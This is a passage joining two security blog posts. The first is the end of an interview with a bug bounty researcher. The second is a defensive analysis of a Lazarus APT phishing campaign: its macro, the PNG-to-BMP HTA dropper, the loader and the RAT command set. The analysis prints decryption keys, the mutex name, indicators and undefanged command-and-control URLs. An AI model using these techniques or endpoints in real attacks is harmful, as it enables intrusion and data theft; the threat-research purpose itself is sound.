Due to the large numbers of researchers/hunters nowadays, and the continuous competition between us, I always try to follow my own methodology—which is different from others’—to avoid duplicated reports, and also to find special bugs that others have missed. Of course, over time, I have to change my methodology to stay in the game: Other researchers discover similar methodologies to mine, the security team adapt and make enumeration harder, and so on.

Q: Do you get a ton of requests to hack people’s Facebook accounts?

A: Actually, I don’t remember receiving requests to hack someone’s Facebook account, but I get requests to verify profiles or pages. I always try to gently explain that I don’t work for Facebook. I redirect them to the right Facebook support or contact page for their needs.

Q: What is the most potentially dangerous discovery you have made?

A: I believe the most dangerous discovery I have found was a Facebook bug that allowed me to return data fragments of any object. This data extraction bug was similar to finding an SQL injection bug, which is rare to find in modern applications. This could have allowed a malicious actor to collect a large amount of data about Facebook infrastructure, users and more.

Q: What advice do you have for aspiring bug bounty hunters?

A: I have always believed that there’s no such thing as a “bug bounty hunter”. There are security experts or researchers. “Bug bounty hunter” tells newcomers, or other experts in the field, that it’s all about bounties for us: How to earn them and what’s the fastest route to do that. Which is clearly wrong, since one must first understand what cybersecurity is and what problems we’re trying to address and fix.

The best advice for people trying to start is to first master a programming language. Then learn about security in a field you like (web, OS, mobile …) and how to write secure code. When learning about security, try to write vulnerable applications that you can exploit, so you can test what you learned against them. If you can understand how a vulnerability occurs in your application, you might try to apply what you learned against real applications, like the ones run by websites with a bug bounty program.

Do not care about bounties to begin with, just about finding bugs. You might report them without even waiting for the security team to reply. At some point, you’ll reach a certain level, with skills and experience gained over years, that will enable you to start making money from it, or by starting a professional career.

We would like to thank Youssef for his cooperation. You can follow Youssef Sammouda on Twitter.

The post Interview with a bug bounty hunter: Youssef Sammouda appeared first on Malwarebytes Labs.

This blog was authored by Hossein Jazi

Lazarus APT is one of the most sophisticated North Korean Threat Actors that has been active since at least 2009. This actor is known to target the U.S., South Korea, Japan and several other countries. In one of their most recent campaigns Lazarus used a complex targeted phishing attack against security researchers.

Lazarus is known to employ new techniques and custom toolsets in its operations to increase the effectiveness of its attacks. On April 13, we identified a document used by this actor to target South Korea. In this campaign, Lazarus resorted to an interesting technique of BMP files embedded with malicious HTA objects to drop its Loader.

Process Graph

This attack likely started by distributing phishing emails that were weaponized with a malicious document. The following figure shows the overall process of this attack. In the next sections, we provide the detailed analysis of this process.

Document Analysis

Opening the document shows a blue theme in Korean that asks the user to enable the macro to view the document.

Upon enabling the macro, a message box will pop up and after clicking the final lure will be loaded.

The document name is in Korean “참가신청서양식.doc” and it is a participation application form for a fair in one of the South Korean cities. The document creation time is 31 March 2021 which indicates that the attack happened around the same time.

The document has been weaponized with a macro that is executed upon opening.

The macro starts by calling MsgBoxOKCancel function. This function pops up a message box to the user with a message claiming to be an older version of Microsoft Office. After showing the message box, it performs the following steps:

• Defines the required variables such as WMI object, Mshta and file extension in base64 format and then calls Decode function to base64 decode them.
• Gets the active document name and separates the name from extension
• Creates a copy of the active document in HTML format using ActiveDocument.SaveAs with wDFormatHTML as parameter. Saving document as HTML will store all the images within this document in FILENAME_files directory.

• Calls show function to makes document protected. By making document protected it makes sure users can not make any changes to the document.

• Gets the image file that has an embedded zlib object. (image003.png)
• Converts the image in PNG format into BMP format by calling WIA_ConvertImage. Since the BMP file format is uncompressed graphics file format, converting a PNG file format into BMP file format automatically decompresses the malicious zlib object embedded from PNG to BMP. This is a clever method used by the actor to bypass security mechanisms that can detect embedded objects within images. The reason is because the document contains a PNG image that has a compressed zlib malicious object and since it’s compressed it can not be detected by static detections. Then the threat actor just used a simple conversion mechanism to decompress the malicious content.

• Gets a WMI object to call Mshta to execute the bmp file. The BMP file after decompression contains a HTA file which executes Java Script to drop a payload.
• Deletes all the images in the directory and then removes the directory generated by the SaveAs function.

BMP file analysis (image003.zip)

The macro added the extension zip to the BMP file during the image conversion process to pretend it’s a zip file. This BMP file has an embedded HTA file. This HTA contains a JavaScript that creates “AppStore.exe” in the “C:UsersPublicLibrariesAppStore.exe” directory and then populates its content.

At the start, it defines an array that contains the list of the functions and parameters required by the script: OpenTextFile, CreateTextFile, Close, Write, FromCharCode, “C:/Users/Public/Libraries/AppStore.exe” and some junk values. When the script wants to perform an action, it calls a second function with a hex value that is responsible for building an index to retrieve the required value from the first array.

For example, at the first step it calls the second function with 0x1dd value. This function subtracts 0x1dc from 0x1dd to get the index for the first array which would be 1. Then it uses this index to retrieve the first element of the first array which would be “C:/Users/Public/Libraries/AppStore.exe”. Following the same process, it calls CreateTextFile to create AppStore.exe and then writes MZ into it. Then it converts the data in decimal format to string by calling fromCharCode function and uses the same procedure it writes them into the AppStore.exe. At the end it calls Wscript.Run to execute the dropped payload.

Payload analysis (AppStore.exe)

AppStore.exe loads a base64 encrypted payload that has been added to the end of itself. Before the payload there is a string which is the decryption key (by7mJSoKVDaWg*Ub).

To decrypt the second stage payload, at first it writes itself into a buffer created by VirtualAlloc and then looks for the encrypted payload and copies it into another buffer.

In the next step, it has implemented its own base64 decoder to decode the allocated buffer and write it into another buffer using memset and memmove. At the end, this encoded payload gets decrypted via XOR using hardcoded decryption key to generate the second stage payload.

After the decryption process has finished, it jumps to the start address of the second payload to execute it.

Second stage payload Analysis

This payload is loaded into memory by AppStore.exe and has not been written to disk. It starts by performing an initialization process which includes the following steps:

• Create Mutex: Checks if a mutex with “Microsoft32” name exist on machine or not and if it exists, it exits. Otherwise, It means the machine has not been infected with this RAT and it starts its malicious activities.
• Resolve API calls: All important API calls have been base64 encoded and RC4 encrypted which will be decoded and decrypted at run time. The key for RC4 decryption is “MicrosoftCorporationValidation@#$%^&*()!US”.

• Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm. You can find the decoder/decryptor here. This custom encryption algorithm is similar to the encryption algorithm used by BISTROMATH RAT associated to Lazarus reported by US-CERT.

http://mail.namusoft.kr/jsp/user/eam/board.jsp
http://www.jinjinpig.co.kr/Anyboard/skin/board.php

After the initialization process has finished, it checks if the communications to C&C servers were successful or not and if they were successful it goes to the next step in which it receives the commands from the server and performs different actions based on the commands.

The commands received from the C&C are base64 encoded and encrypted using its custom encryption algorithm (Figure 16). After deobfuscation, it performs the following commands based on the command codes. The communications to the server have been done through send and recv socket functions.

• 8888: It tries to execute the command it has received after command code in two different ways. At first it tries to execute the command by creating a new thread (Figure 17). This thread gets the command after command code and executes it using cmd.exe. This process has been done through using CreatePipe and CreateProcessA. Then it uses ReadFile to read the output of cmd.exe.

Output of cmd.exe has been encoded and encrypted and is sent to the server as test.gif using an HTTP POST request (Figure 18).

If the CreateThread process was not successful, it executes the command by calling WinExec and then sends the “”8888 Success!” message after encrypting it using its custom encryption and then encoding it using base64 to the server as test.gif.

• 1234: It calls CreateThread to execute the buffer(third stage payload) it received from the server. At the end it encodes and encrypts “1234 Success!” and sends it to the server as test.gif.
• 2099: It creates a batch file and executes it and then exits. This batch file deletes the AppStore.exe from the victim’s machine.

• 8877: It stores the buffer received from server in a file.
• 1111: It calls The shutdown function to disables sends or receives on a socket.

This second stage payload has used custom encoded user agents for its communications. All of these user agents have been base64 encoded and encrypted using the same custom encryption algorithm used to encrypt the server addresses. Here is the list of the different user agents used by this RAT.

Mozilla/%d.0  (compatible; MSIE %d.0; Windows NT %d.%d; WOW64; Trident/%d.0; Infopath.%d)

Mozilla/18463680.0  (compatible; MSIE -641.0; Windows NT 1617946400.-858993460; WOW64; Trident/-858993460.0; Infopath.-858993460)

Mozilla/18463680.0  (compatible; MSIE -641.0; Windows NT 1617946400.-858993460; Trident/-858993460.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Infopath.-858993460)

Mozilla/%d.0  (Windows NT %d.%d%s) AppleWebKit/537.%d (KHTML, like Gecko) Chrome/%d.0.%d.%d Safari/%d.%d Infopath.%d

Attribution

There are several similarities between this attack and past Lazarus operations and we believe these are strong indicators to attribute this attack to the Lazarus threat actor.

• The second stage payload has used the similar custom encryption algorithm that has been used by BISTROMATH RAT associated to this APT.
• The second stage payload has used a combination of base64 and RC4 for data obfuscation which is a common technique used by this APT.
• The second stage payload used in this attack has some code similarities with some of known Lazarus malware families including Destover.
• Sending data and messages as a GIF to a server has been observed in past Lazarus operations including AppleJeus, Supply Chain attack against South Korea and the DreamJob operation.
• This phishing attack has targeted South Korea which is one of the main targets of this actor.
• The group is known to use Mshta.exe to run malicious scripts and download programs which is similar to what has been used in this attack.

Conclusion

The Lazarus threat actor is one of the most active and sophisticated North Korean threat actors that has targeted several countries including South Korea, the U.S. and Japan in the past couple of years. The group is known to develop custom malware families and use new techniques in its operations. In this blog we documented a spear phishing attack operated by this APT group that has targeted South Korea.

The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format. The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commands/shellcode as well as perform exfiltration and communications to a command and control server.

Indicators of Compromise

Document

F1EED93E555A0A33C7FEF74084A6F8D06A92079E9F57114F523353D877226D72

Dropped executable

ED5FBEFD61A72EC9F8A5EBD7FA7BCD632EC55F04BDD4A4E24686EDCCB0268E05

Command and control servers

jinjinpig[.]co[.]kr
mail[.]namusoft[.]kr

The post Lazarus APT conceals malicious code within BMP image to drop its RAT appeared first on Malwarebytes Labs.